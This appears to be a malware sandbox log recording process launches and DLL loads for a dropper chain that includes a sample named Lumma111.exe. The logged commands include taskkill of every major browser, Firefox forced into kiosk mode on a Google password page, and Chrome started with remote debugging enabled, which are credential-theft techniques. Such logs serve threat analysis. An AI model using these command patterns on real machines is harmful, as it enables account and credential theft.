Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe"
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2472,i,16605416690938131637,11171978331131266651,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9bfa6f4-5706-4739-9566-52a3cba8771f} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 1994546a710 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3680 -parentBuildID 20230927232528 -prefsHandle 3544 -prefMapHandle 3364 -prefsLen 26143 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4e17abc-4329-41b2-ac0f-990e55a3f15c} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 19955ba9e10 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe "C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe"
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe "C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe "C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe "C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2472,i,16605416690938131637,11171978331131266651,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9bfa6f4-5706-4739-9566-52a3cba8771f} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 1994546a710 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3680 -parentBuildID 20230927232528 -prefsHandle 3544 -prefMapHandle 3364 -prefsLen 26143 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4e17abc-4329-41b2-ac0f-990e55a3f15c} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 19955ba9e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
